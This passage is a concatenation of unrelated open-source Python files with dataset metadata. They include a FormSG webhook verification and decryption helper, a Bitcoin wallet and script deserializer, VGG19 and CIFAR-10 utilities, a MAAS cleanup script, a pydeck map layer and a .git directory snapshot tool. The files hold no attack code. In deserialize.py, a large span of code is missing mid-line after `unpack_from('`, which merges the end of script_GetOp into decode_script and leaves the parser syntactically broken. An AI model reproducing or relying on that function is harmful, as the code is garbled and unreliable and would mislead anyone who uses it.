'decrypt_attachment']\nimport json\nimport logging\nimport re\nfrom time import time\nfrom typing import Any\nfrom typing import Dict\nfrom typing import Mapping\nfrom typing import Optional\nfrom typing import cast\nfrom urllib.parse import urlparse\n\nfrom nacl.encoding import Base64Encoder\nfrom nacl.exceptions import BadSignatureError\nfrom nacl.public import Box\nfrom nacl.public import PrivateKey\nfrom nacl.public import PublicKey\nfrom nacl.signing import VerifyKey\nimport requests\n\nlogger = logging.getLogger(__name__)\n\n# See https://github.com/opengovsg/formsg-javascript-sdk#step-3---verify-the-signature # noqa\nformsg_webhook_public_key = VerifyKey(\n b'3Tt8VduXsjjd4IrpdCd7BAkdZl/vUCstu9UvTX84FWw=',\n encoder=Base64Encoder,\n)\nencrypted_content_regex = re.compile((\n r'^(?P[\\w\\+\\/\\=]*)\\;'\n r'(?P[\\w\\+\\/\\=]*)\\:'\n r'(?P[\\w\\+\\/\\=]*)$'\n))\n\n\ndef verify_signature(\n webhook_uri: str,\n signature_header: str,\n signature_expiry_seconds: float = 60,\n webhook_public_key: VerifyKey = formsg_webhook_public_key,\n) -> Mapping[str, Any]:\n # v1 is signature, s is submissionId, f is formId, t is submission epoch\n logger.debug('X-FormSG-Signature is <%s>.', signature_header)\n\n formsg_signature: Dict[str, Any] = {}\n for part in signature_header.split(','):\n k, v = part.split('=', 1)\n formsg_signature[k] = v\n\n # Javascript url.href adds a trailing `/` to root domain urls\n # https://github.com/opengovsg/formsg-javascript-sdk/blob/master/src/webhooks.ts#L25\n u = urlparse(webhook_uri)\n if not u.path:\n u = u._replace(path='/')\n webhook_uri = u.geturl()\n\n signature_timestamp_millis = int(formsg_signature['t'])\n webhook_public_key.verify(\n smessage='.'.join((\n webhook_uri,\n formsg_signature['s'],\n formsg_signature['f'],\n formsg_signature['t'],\n )).encode('ascii'),\n signature=Base64Encoder.decode(formsg_signature['v1']),\n )\n\n if time() - (signature_timestamp_millis / 1000) > signature_expiry_seconds:\n raise BadSignatureError('FormSG signature has expired.')\n\n return formsg_signature\n\n\ndef decrypt_content(\n body: Mapping[str, Any],\n secret_key: str, # Base64 encoded secret key\n) -> Mapping[str, Any]:\n # Some FormSG submissions are in a data field while others are not.\n body = body.get('data', body)\n encrypted_content = body['encryptedContent']\n\n m = encrypted_content_regex.match(encrypted_content)\n if not m:\n raise ValueError('Encrypted content has bad format.')\n\n submission_public_key = m.group('submission_public_key')\n nonce = m.group('nonce')\n encrypted_message = m.group('encrypted_message')\n\n box = Box(\n PrivateKey(secret_key.encode('ascii'), encoder=Base64Encoder),\n PublicKey(\n submission_public_key.encode('ascii'),\n encoder=Base64Encoder,\n ),\n )\n\n plaintext = box.decrypt(\n encrypted_message.encode('ascii'),\n Base64Encoder.decode(nonce.encode('ascii')),\n encoder=Base64Encoder,\n )\n\n return cast(Mapping[str, Any], json.loads(plaintext))\n\n\ndef decrypt_attachment(\n body: Mapping[str, Any],\n field_id: str,\n secret_key: str, # Base64 encoded secret key\n timeout: float = 5, # Default timeout for requests\n) -> Optional[bytes]:\n # Some FormSG submissions are in a data field while others are not.\n body = body.get('data', body)\n\n # DEVX-467: `field_id` did not include an attachment; its an optional field\n try:\n # Either attachmentDownloadUrls or field_id can be missing\n url = body['attachmentDownloadUrls'][field_id]\n except KeyError:\n return None\n\n r = requests.get(url, timeout=timeout)\n r.raise_for_status()\n\n attachment_body = r.json()\n encrypted_file: Mapping[str, str] = attachment_body['encryptedFile']\n box = Box(\n PrivateKey(secret_key.encode('ascii'), encoder=Base64Encoder),\n PublicKey(\n encrypted_file['submissionPublicKey'].encode('ascii'),\n encoder=Base64Encoder,\n ),\n )\n\n return box.decrypt(\n encrypted_file['binary'].encode('ascii'),\n Base64Encoder.decode(encrypted_file['nonce'].encode('ascii')),\n encoder=Base64Encoder,\n )\n","repo_name":"fivehealth/formsg-python-sdk","sub_path":"formsg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"29774847135","text":"#!/usr/bin/env python3\n\n\"\"\"\nCheck that all .whl files in the dist folder have the correct LICENSE files\nincluded.\n\nTo run:\n $ python3 setup.py bdist_wheel\n $ ./ci/check_wheel_licenses.py\n\"\"\"\n\nfrom pathlib import Path\nimport sys\nimport zipfile\n\nEXIT_SUCCESS = 0\nEXIT_FAILURE = 1\n\nproject_dir = Path(__file__).parent.resolve().parent\ndist_dir = project_dir / 'dist'\nlicense_dir = project_dir / 'LICENSE'\n\nlicense_file_names = {path.name for path in sorted(license_dir.glob('*'))}\nfor wheel in dist_dir.glob('*.whl'):\n print(f'Checking LICENSE files in: {wheel}')\n with zipfile.ZipFile(wheel) as f:\n wheel_license_file_names = {Path(path).name\n for path in sorted(f.namelist())\n if '.dist-info/LICENSE' in path}\n if not (len(wheel_license_file_names) and\n wheel_license_file_names.issuperset(license_file_names)):\n print(f'LICENSE file(s) missing:\\n'\n f'{wheel_license_file_names} !=\\n'\n f'{license_file_names}')\n sys.exit(EXIT_FAILURE)\nsys.exit(EXIT_SUCCESS)\n","repo_name":"tcjwoods/tc_cvs-p1","sub_path":"device/Dependencies/matplotlib-main/ci/check_wheel_licenses.py","file_name":"check_wheel_licenses.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5819270091","text":"from typing import Tuple, List\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets\nfrom torchvision import transforms as T\n\nDEFAULT_DATA_DIR = \"datasets/\"\n\n\ndef get_cifar10_train(root: str = DEFAULT_DATA_DIR,\n transforms: T.Compose = None) -> Dataset:\n ds = datasets.CIFAR10(root=root,\n train=True,\n download=True,\n transform=transforms)\n return ds\n\ndef get_cifar10_test(root: str = DEFAULT_DATA_DIR,\n transforms: T.Compose = None) -> Dataset:\n return datasets.CIFAR10(root=root,\n train=False,\n download=True,\n transform=transforms)\n\n\ndef get_cifar10_data(root: str = DEFAULT_DATA_DIR,\n train_transforms: T.Compose = None,\n test_transforms: T.Compose = None) -> List[Dataset]:\n \"\"\"\n\n :rtype: object\n \"\"\"\n cifar10_train = get_cifar10_train(root, train_transforms)\n cifar10_test = get_cifar10_test(root, test_transforms)\n return [cifar10_train, cifar10_test]\n\n\ndef get_cifar10_feature_extractor(image_size: Tuple[int, int] = (224, 224)) -> T.Compose:\n return T.Compose([\n T.PILToTensor(),\n T.Resize(image_size, T.InterpolationMode.BILINEAR, antialias=False),\n T.ConvertImageDtype(torch.float32),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])","repo_name":"Pallisaard/ATIA-convnets-vs-transformers","sub_path":"data/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15531488131","text":"'''\nAuthor: TylerQA 990687322@qq.com\nDate: 2023-04-26 16:27:38\nLastEditors: TylerQA 990687322@qq.com\nLastEditTime: 2023-04-27 11:44:21\nFilePath: \\atfx_-ui_framework\\testcases\\test_review.py\nDescription: 这是默认设置,请设置`customMade`, 打开koroFileHeader查看配置 进行设置: https://github.com/OBKoro1/koro1FileHeader/wiki/%E9%85%8D%E7%BD%AE\n'''\nimport pytest\nimport pytest_check as check\nimport sys,os\nfrom loguru import logger\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),'tools'))\nfrom global_SystemEnv import SystemEnv\nfrom handle_excel import HandleExcel\nsys.path.append(os.path.join(SystemEnv.CP_PAGE_OBJ))\nsys.path.append(os.path.join(SystemEnv.BOS_PAGE_OBJ))\nsys.path.append(os.path.join(SystemEnv.DATA_DIR))\nfrom bos_home_page_obj import Bos_Home_Page_Obj\nfrom bos_clientlist_page_obj import Bos_Client_Page_Obj\n\n\n@pytest.mark.usefixtures('browser')\nclass TestReview(object):\n\n test_data = HandleExcel(os.path.join(SystemEnv.DATA_DIR,'testcases.xlsx'),'gm_kyc').read_excel_data_obj()\n \n @pytest.mark.run(order=2)\n @pytest.mark.regress\n @pytest.mark.parametrize('data',test_data)\n def test_review(self,data,browser):\n case_index = self.test_data.index(data)\n if hasattr(SystemEnv,f'account{case_index+2}'):\n data.account = getattr(SystemEnv,f'account{case_index+2}')\n\n logger.info(f'当前用例:审核主账号: {data.account}')\n\n #进入账号详情页\n bos_home = Bos_Home_Page_Obj(browser)\n bos_home.into_client_list(data.account)\n\n #审核\n bos_client_list = Bos_Client_Page_Obj(browser)\n bos_client_list.review(data.account,1)\n\n #断言并获取交易账号\n check.is_in(bos_client_list.status,'Successful (1st Review) 成功(初审)')\n\nif __name__ == '__main__': \n pytest.main(['-vs',\n os.path.abspath(__file__),\n '--disable-pytest-warnings']) \n","repo_name":"Tyler96-QA/API_UI_FW","sub_path":"atfx_ui_framework/testcases/test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29657436706","text":"#\n#\n#\n\nfrom BCDataStream import *\nfrom enumeration import Enumeration\nfrom base58 import public_key_to_bc_address, hash_160_to_bc_address\nimport socket\nimport time\nfrom util import short_hex, long_hex\n\ndef parse_CAddress(vds):\n d = {}\n d['nVersion'] = vds.read_int32()\n d['nTime'] = vds.read_uint32()\n d['nServices'] = vds.read_uint64()\n d['pchReserved'] = vds.read_bytes(12)\n d['ip'] = socket.inet_ntoa(vds.read_bytes(4))\n d['port'] = vds.read_uint16()\n return d\n\ndef deserialize_CAddress(d):\n return d['ip']+\":\"+str(d['port'])+\" (lastseen: %s)\"%(time.ctime(d['nTime']),)\n\ndef parse_setting(setting, vds):\n if setting[0] == \"f\": # flag (boolean) settings\n return str(vds.read_boolean())\n elif setting[0:4] == \"addr\": # CAddress\n d = parse_CAddress(vds)\n return deserialize_CAddress(d)\n elif setting == \"nTransactionFee\":\n return vds.read_int64()\n elif setting == \"nLimitProcessors\":\n return vds.read_int32()\n return 'unknown setting'\n\ndef parse_TxIn(vds):\n d = {}\n d['prevout_hash'] = vds.read_bytes(32)\n d['prevout_n'] = vds.read_uint32()\n d['scriptSig'] = vds.read_bytes(vds.read_compact_size())\n d['sequence'] = vds.read_uint32()\n return d\ndef deserialize_TxIn(d):\n if d['prevout_hash'] == \"\\x00\"*32:\n result = \"TxIn: COIN GENERATED\"\n result += \" coinbase:\"+d['scriptSig'].encode('hex_codec')\n else:\n result = \"TxIn: prev(\"+long_hex(d['prevout_hash'][::-1])+\":\"+str(d['prevout_n'])+\")\"\n pk = extract_public_key(d['scriptSig'])\n result += \" pubkey: \"+pk\n result += \" sig: \"+decode_script(d['scriptSig'])\n if d['sequence'] < 0xffffffff: result += \" sequence: \"+hex(d['sequence'])\n return result\n\ndef parse_TxOut(vds):\n d = {}\n d['value'] = vds.read_int64()\n d['scriptPubKey'] = vds.read_bytes(vds.read_compact_size())\n return d\ndef deserialize_TxOut(d):\n result = \"TxOut: value: %.2f\"%(d['value']/1.0e8,)\n pk = extract_public_key(d['scriptPubKey'])\n result += \" pubkey: \"+pk\n result += \" Script: \"+decode_script(d['scriptPubKey'])\n return result\n\ndef parse_Transaction(vds):\n d = {}\n d['version'] = vds.read_int32()\n n_vin = vds.read_compact_size()\n d['txIn'] = []\n for i in xrange(n_vin):\n d['txIn'].append(parse_TxIn(vds))\n n_vout = vds.read_compact_size()\n d['txOut'] = []\n for i in xrange(n_vout):\n d['txOut'].append(parse_TxOut(vds))\n d['lockTime'] = vds.read_uint32()\n return d\ndef deserialize_Transaction(d):\n result = \"%d tx in, %d out\\n\"%(len(d['txIn']), len(d['txOut']))\n for txIn in d['txIn']:\n result += deserialize_TxIn(txIn) + \"\\n\"\n for txOut in d['txOut']:\n result += deserialize_TxOut(txOut) + \"\\n\"\n return result\n\ndef parse_MerkleTx(vds):\n d = parse_Transaction(vds)\n d['hashBlock'] = vds.read_bytes(32)\n n_merkleBranch = vds.read_compact_size()\n d['merkleBranch'] = vds.read_bytes(32*n_merkleBranch)\n d['nIndex'] = vds.read_int32()\n return d\n\ndef deserialize_MerkleTx(d):\n result = deserialize_Transaction(d)\n result = \"Merkle hashBlock: \"+short_hex(d['hashBlock'][::-1])+\"\\n\" + result\n return result\n\ndef parse_WalletTx(vds):\n d = parse_MerkleTx(vds)\n n_vtxPrev = vds.read_compact_size()\n d['vtxPrev'] = []\n for i in xrange(n_vtxPrev):\n d['vtxPrev'].append(parse_MerkleTx(vds))\n\n d['mapValue'] = {}\n n_mapValue = vds.read_compact_size()\n for i in xrange(n_mapValue):\n key = vds.read_string()\n value = vds.read_string()\n d['mapValue'][key] = value\n n_orderForm = vds.read_compact_size()\n d['orderForm'] = []\n for i in xrange(n_orderForm):\n first = vds.read_string()\n second = vds.read_string()\n d['orderForm'].append( (first, second) )\n # Versioning was messed up before bitcoin 0.3.14.04;\n # nVersion is actually fTimeReceivedIsTxTime before then.\n d['nVersion'] = vds.read_uint32()\n d['timeReceived'] = vds.read_uint32()\n d['fromMe'] = vds.read_boolean()\n d['spent'] = vds.read_boolean()\n if d['nVersion'] > 31404:\n d['fTimeReceivedIsTxTime'] = vds.read_boolean()\n d['fUnused'] = vds.read_boolean()\n d['fromAccount'] = vds.read_string()\n\n return d\n\ndef deserialize_WalletTx(d):\n result = deserialize_MerkleTx(d)\n\n result += \"mapValue:\"+str(d['mapValue'])\n # One of these days I'll ask Satoshi what the orderForm stuff is/was for...\n # result += \"\\n\"+\" orderForm:\"+str(d['orderForm'])\n result += \"\\n\"+\"timeReceived:\"+time.ctime(d['timeReceived'])+\" fromMe:\"+str(d['fromMe'])+\" spent:\"+str(d['spent'])\n if d['nVersion'] > 31404:\n result += \"\\n fromAccount: \"+d['fromAccount']\n return result\n\ndef parse_Block(vds):\n d = {}\n d['version'] = vds.read_int32()\n d['hashPrev'] = vds.read_bytes(32)\n d['hashMerkleRoot'] = vds.read_bytes(32)\n d['nTime'] = vds.read_uint32()\n d['nBits'] = vds.read_uint32()\n d['nNonce'] = vds.read_uint32()\n d['transactions'] = []\n nTransactions = vds.read_compact_size()\n for i in xrange(nTransactions):\n d['transactions'].append(parse_Transaction(vds))\n\n return d\n \ndef deserialize_Block(d):\n result = \"Time: \"+time.ctime(d['nTime'])+\" Nonce: \"+str(d['nNonce'])\n result += \"\\nnBits: 0x\"+hex(d['nBits'])\n result += \"\\nhashMerkleRoot: 0x\"+d['hashMerkleRoot'][::-1].encode('hex_codec')\n result += \"\\nPrevious block: \"+d['hashPrev'][::-1].encode('hex_codec')\n result += \"\\n%d transactions:\\n\"%len(d['transactions'])\n for t in d['transactions']:\n result += deserialize_Transaction(t)+\"\\n\"\n return result\n\nopcodes = Enumeration(\"Opcodes\", [\n (\"OP_0\", 0), (\"OP_PUSHDATA1\",76), \"OP_PUSHDATA2\", \"OP_PUSHDATA4\", \"OP_1NEGATE\", \"OP_RESERVED\",\n \"OP_1\", \"OP_2\", \"OP_3\", \"OP_4\", \"OP_5\", \"OP_6\", \"OP_7\",\n \"OP_8\", \"OP_9\", \"OP_10\", \"OP_11\", \"OP_12\", \"OP_13\", \"OP_14\", \"OP_15\", \"OP_16\",\n \"OP_NOP\", \"OP_VER\", \"OP_IF\", \"OP_NOTIF\", \"OP_VERIF\", \"OP_VERNOTIF\", \"OP_ELSE\", \"OP_ENDIF\", \"OP_VERIFY\",\n \"OP_RETURN\", \"OP_TOALTSTACK\", \"OP_FROMALTSTACK\", \"OP_2DROP\", \"OP_2DUP\", \"OP_3DUP\", \"OP_2OVER\", \"OP_2ROT\", \"OP_2SWAP\",\n \"OP_IFDUP\", \"OP_DEPTH\", \"OP_DROP\", \"OP_DUP\", \"OP_NIP\", \"OP_OVER\", \"OP_PICK\", \"OP_ROLL\", \"OP_ROT\",\n \"OP_SWAP\", \"OP_TUCK\", \"OP_CAT\", \"OP_SUBSTR\", \"OP_LEFT\", \"OP_RIGHT\", \"OP_SIZE\", \"OP_INVERT\", \"OP_AND\",\n \"OP_OR\", \"OP_XOR\", \"OP_EQUAL\", \"OP_EQUALVERIFY\", \"OP_RESERVED1\", \"OP_RESERVED2\", \"OP_1ADD\", \"OP_1SUB\", \"OP_2MUL\",\n \"OP_2DIV\", \"OP_NEGATE\", \"OP_ABS\", \"OP_NOT\", \"OP_0NOTEQUAL\", \"OP_ADD\", \"OP_SUB\", \"OP_MUL\", \"OP_DIV\",\n \"OP_MOD\", \"OP_LSHIFT\", \"OP_RSHIFT\", \"OP_BOOLAND\", \"OP_BOOLOR\",\n \"OP_NUMEQUAL\", \"OP_NUMEQUALVERIFY\", \"OP_NUMNOTEQUAL\", \"OP_LESSTHAN\",\n \"OP_GREATERTHAN\", \"OP_LESSTHANOREQUAL\", \"OP_GREATERTHANOREQUAL\", \"OP_MIN\", \"OP_MAX\",\n \"OP_WITHIN\", \"OP_RIPEMD160\", \"OP_SHA1\", \"OP_SHA256\", \"OP_HASH160\",\n \"OP_HASH256\", \"OP_CODESEPARATOR\", \"OP_CHECKSIG\", \"OP_CHECKSIGVERIFY\", \"OP_CHECKMULTISIG\",\n \"OP_CHECKMULTISIGVERIFY\",\n (\"OP_SINGLEBYTE_END\", 0xF0),\n (\"OP_DOUBLEBYTE_BEGIN\", 0xF000),\n \"OP_PUBKEY\", \"OP_PUBKEYHASH\",\n (\"OP_INVALIDOPCODE\", 0xFFFF),\n])\n\ndef script_GetOp(bytes):\n i = 0\n while i < len(bytes):\n vch = None\n opcode = ord(bytes[i])\n i += 1\n if opcode >= opcodes.OP_SINGLEBYTE_END:\n opcode <<= 8\n opcode |= bytes[i]\n i += 1\n\n if opcode <= opcodes.OP_PUSHDATA4:\n nSize = opcode\n if opcode == opcodes.OP_PUSHDATA1:\n nSize = ord(bytes[i])\n i += 1\n elif opcode == opcodes.OP_PUSHDATA2:\n nSize = unpack_from(' 0: result += \" \"\n if opcode <= opcodes.OP_PUSHDATA4:\n result += \"%d:\"%(opcode,)\n result += short_hex(vch)\n else:\n result += script_GetOpName(opcode)\n return result\n\ndef match_decoded(decoded, to_match):\n if len(decoded) != len(to_match):\n return False;\n for i in range(len(decoded)):\n if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4:\n continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.\n if to_match[i] != decoded[i][0]:\n return False\n return True\n\ndef extract_public_key(bytes):\n decoded = [ x for x in script_GetOp(bytes) ]\n\n # non-generated TxIn transactions push a signature\n # (seventy-something bytes) and then their public key\n # (65 bytes) onto the stack:\n match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]\n if match_decoded(decoded, match):\n return public_key_to_bc_address(decoded[1][1])\n\n # The Genesis Block, self-payments, and pay-by-IP-address payments look like:\n # 65 BYTES:... CHECKSIG\n match = [ opcodes.OP_PUSHDATA4, opcodes.OP_CHECKSIG ]\n if match_decoded(decoded, match):\n return public_key_to_bc_address(decoded[0][1])\n\n # Pay-by-Bitcoin-address TxOuts look like:\n # DUP HASH160 20 BYTES:... EQUALVERIFY CHECKSIG\n match = [ opcodes.OP_DUP, opcodes.OP_HASH160, opcodes.OP_PUSHDATA4, opcodes.OP_EQUALVERIFY, opcodes.OP_CHECKSIG ]\n if match_decoded(decoded, match):\n return hash_160_to_bc_address(decoded[2][1])\n\n return \"(None)\"\n","repo_name":"tuxsoul/bitcoin-tools","sub_path":"deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"5147168295","text":"from torchvision.models import VGG\nfrom torchvision import transforms\nimport torch\nfrom torch import nn\nfrom typing import Union, List, Any, cast\nfrom torchvision.models.vgg import VGG19_Weights\n\nclass VGG_with_trans(VGG):\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = transforms.Resize([224,224])(x)\n x = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])(x)\n x = self.features(x)\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n x = self.classifier(x)\n return x\n\n\ndef make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential:\n layers: List[nn.Module] = []\n in_channels = 3\n for v in cfg:\n if v == \"M\":\n layers += [nn.MaxPool2d(kernel_size=2, stride=2)]\n else:\n v = cast(int, v)\n conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)\n if batch_norm:\n layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]\n else:\n layers += [conv2d, nn.ReLU(inplace=True)]\n in_channels = v\n return nn.Sequential(*layers)\n\ndef vgg19_IN(**kwargs: Any) -> VGG_with_trans:\n weights = VGG19_Weights.IMAGENET1K_V1\n weights = VGG19_Weights.verify(weights)\n cfgs_cfg = [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"]\n model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False),**kwargs)\n model.load_state_dict(weights.get_state_dict(progress=True))\n return model\n\ndef vgg19_cifar(**kwargs: Any) -> VGG_with_trans:\n cfgs_cfg = [64, 64, \"M\", 128, 128, \"M\", 256, 256, 256, 256, \"M\", 512, 512, 512, 512, \"M\", 512, 512, 512, 512, \"M\"]\n # model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False), num_classes=10,**kwargs)\n model = VGG_with_trans(features=make_layers(cfgs_cfg, batch_norm=False), num_classes=10,**kwargs)\n return model\n","repo_name":"HanxiuZhang/Adversarial-Frequency-Watermark","sub_path":"models/vgg_19.py","file_name":"vgg_19.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21454507810","text":"#!/usr/bin/env python\n\"\"\"Delete all machines from given MAAS environment.\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nfrom datetime import (\n datetime,\n timedelta,\n )\nimport sys\n\nfrom jujupy import JujuData\nimport substrate\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(\n description=\"Delete the machines in MAAS.\")\n parser.add_argument(\"name\", help=\"Name of the MAAS in juju config.\")\n parser.add_argument('--hours', help='Minimum age in hours.', type=float)\n parser.add_argument('--dry-run', action='store_true',\n help=\"Show what would be deleted, but don't delete.\")\n args = parser.parse_args(argv[1:])\n boot_config = JujuData.from_config(args.name)\n with substrate.maas_account_from_boot_config(boot_config) as manager:\n machines = manager.get_allocated_nodes()\n if args.hours is not None:\n threshold = datetime.now() - timedelta(hours=args.hours)\n machines = dict(\n (k, v) for k, v in machines.items()\n if manager.get_acquire_date(v['system_id']) < threshold)\n print(\"Found {} machines: {}\".format(len(machines), machines.keys()))\n if not args.dry_run:\n manager.terminate_instances(machine[\"resource_uri\"]\n for machine in machines.values())\n print(\"Released.\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","repo_name":"juju/1.25-upgrade","sub_path":"juju2/acceptancetests/clean_maas.py","file_name":"clean_maas.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"13809839777","text":"import copy\nimport functools\n\nimport pydeck\n\nfrom typing import Iterable, Any\n\nfrom splyne.mapping.common.common import GeoPoint\nfrom splyne.mapping.common.view_state import ViewState\nfrom splyne.mapping.layers.base import BaseLayer\nfrom splyne.utils.transformers import make_pipe\n\n\nclass ScatterplotLayer(BaseLayer):\n\n DEFAULT_RADIUS = 10\n DEFAULT_LINE_WIDTH = 1\n DEFAULT_COLOR = [50, 20, 200]\n\n DEFAULT_PARAMS = {\n 'pickable': True,\n 'stroked': True,\n 'filled': True,\n 'radius_min_pixels': DEFAULT_RADIUS,\n 'radius_max_pixels': DEFAULT_RADIUS,\n 'radius_scale': 10,\n 'line_width_min_pixels ': DEFAULT_LINE_WIDTH,\n 'line_width_max_pixels': DEFAULT_LINE_WIDTH,\n 'get_position': ['lon', 'lat'],\n 'get_radius': 100,\n 'get_color': DEFAULT_COLOR,\n }\n\n def __init__(\n self,\n data: Iterable[Any],\n view_state: ViewState,\n **kwargs,\n ):\n super().__init__()\n self.pydeck_kwargs = ScatterplotLayer.DEFAULT_PARAMS\n self.pydeck_kwargs.update(kwargs)\n\n data_tranformer = make_pipe(\n copy.deepcopy,\n functools.partial(self._update_view_state, view_state=view_state),\n self._update_kwargs,\n )\n self.data = data_tranformer(data)\n\n def _update_kwargs(self, item: Any) -> Any:\n if 'color' in item:\n self.pydeck_kwargs['get_color'] = 'color'\n if 'size' in item:\n self.pydeck_kwargs['get_size'] = 'size'\n return item\n\n def _update_view_state(self, item: Any, view_state: ViewState) -> Any:\n view_state.update(GeoPoint(item['lat'], item['lon']))\n return item\n\n def _update_view_state_from_iter(self, data: Iterable[Any], view_state: ViewState):\n for item in data:\n yield self._update_view_state(item, view_state)\n\n def make_pydeck_layer(self) -> pydeck.Layer:\n return pydeck.Layer(\"ScatterplotLayer\", data=list(self.data), **self.pydeck_kwargs)\n","repo_name":"pornopatsan/splyne","sub_path":"splyne/mapping/layers/scatterplot.py","file_name":"scatterplot.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14570870445","text":"#!/usr/bin/env python\n\"\"\" snapshots.py: How to use this file:\n this is a basic git directory tracker (super low functionality). What does\n it do? First, create a GitDirLog with\n\n import snapshots\n log = snapshots.GitDirLog(path_to_git_directory)\n\n Note that the git directory is the actual .git/ directory (not your repo!)\n Then go ahead and create a snapshot with:\n\n log.take_snapshot('optional message')\n\n Note that the message is pretty important for knowing what each snapshot is.\n Okay, now that you've taken a snapshot go make a change to your repository\n (with a git add, git commit, git branch, git checkout, etc) and take another\n snapshot:\n\n log.take_snapshot('I made a change and I liked iiiit')\n\n Note that this will return the snapshot object\n\n\"\"\"\nimport hashlib\nfrom datetime import datetime\nfrom os import path\nfrom os import walk\n\nfrom gitutil.git_fs import GitIndex\n\nFILE = 'f'\nDIR = 'd'\n\n\nclass Entry:\n \"\"\" An Entry represents either a file or a directory and stores information\n about the file such as the name, contents, hash, type, create date and\n modified date.\n \"\"\"\n\n def __init__(self, name, contents=None, sha1=0, tp=DIR,\n cdate=None, mdate=None, uid=None, gid=None, perms=None):\n self.name = name\n self.contents = contents\n self.sha1 = sha1\n self.type = tp\n self.cdate = cdate\n self.mdate = mdate\n self.uid = uid\n self.gid = gid\n self.perms = perms\n\n idx = name.index('.git')\n self.short_name = name[idx:]\n\n def __str__(self):\n return '[{}] {}'.format(self.type, self.short_name)\n\n def long_string(self):\n return '[{}] {} : {} : {}'.format(self.type, self.short_name, self.sha1,\n self.cdate, self.mdate)\n\n def __repr__(self):\n return str(self)\n\n def __le__(self, other):\n return self.name <= other.name\n\n def __lt__(self, other):\n return self.name < other.name\n\n def __gt__(self, other):\n return self.name > other.name\n\n def __ge__(self, other):\n return self.name >= other.name\n\n\nclass GitDirParser:\n \"\"\" Creates a time-indexed list of entries\"\"\"\n ext_to_ignore = ['swp']\n entries = []\n\n def __init__(self, mypath, verbose=True):\n self.path = mypath\n self.index = None\n if '.git' not in mypath:\n raise RuntimeError(\"Not a .git repository: \" + mypath)\n for (dirpath, dirnames, fnames) in walk(mypath):\n for d in dirnames:\n dname = dirpath + '/' + d\n cdt = str(datetime.fromtimestamp(path.getctime(dname)))\n mdt = str(datetime.fromtimestamp(path.getmtime(dname)))\n self.entries.append(Entry(dname, contents=None, sha1=0, tp=DIR,\n cdate=cdt, mdate=mdt))\n for f in fnames:\n fname = path.join(dirpath, f)\n try:\n with open(fname, 'rb') as afile:\n contents = afile.read()\n if fname.endswith('.git/index'):\n self.index = GitIndex(contents, verbose)\n contents = str(contents).encode('utf-8')\n\n sha1hasher = hashlib.sha1()\n sha1hasher.update(contents)\n sha1 = sha1hasher.hexdigest()\n cdt = str(datetime.fromtimestamp(path.getctime(fname)))\n mdt = str(datetime.fromtimestamp(path.getmtime(fname)))\n self.entries.append(Entry(fname, contents, sha1, tp=FILE,\n cdate=cdt, mdate=mdt))\n except Exception as e:\n print(\"Error reading fname: \" + fname + '. ' + dirpath, dirnames, fnames)\n import traceback\n traceback.print_exc()\n\n\nclass DiffObject:\n def __init__(self, fst, snd):\n \"\"\"\n fst: GitDirSnapshot\n snd: GitDirSnapshot\n created: list of entries that were created (from fst to snd)\n removed: list of entries that were removed (from fst to snd)\n modified: list of entires that were modified (from fst to snd)\n static: list of entries that were unchanged (from fst to snd)\n \"\"\"\n self.fst = fst\n self.snd = snd\n created = []\n removed = []\n modified = []\n static = []\n\n if fst is None:\n for key in snd.entries.keys():\n created.append(snd.entries[key])\n\n else:\n fstkeys = fst.entries.keys()\n sndkeys = snd.entries.keys()\n allkeys = set(fstkeys).union(set(sndkeys))\n\n for key in allkeys:\n if key not in fstkeys:\n # key must be in self.entries and hence created\n created.append(snd.entries[key])\n\n elif key not in sndkeys:\n removed.append(fst.entries[key])\n\n elif key in sndkeys and key in fstkeys:\n new, old = snd.entries[key], fst.entries[key]\n if new.type == 'd' and old.type == 'd':\n static.append(new)\n\n elif new.type == 'f' and old.type == 'f':\n if new.sha1 == old.sha1:\n static.append(new)\n else:\n modified.append(new)\n else:\n modified.append(new)\n\n self.created = created\n self.removed = removed\n self.modified = modified\n self.static = static\n\n def print_diff(self, updated_only=True):\n print('+' + '-' * 78 + '+')\n\n if self.fst and self.snd:\n 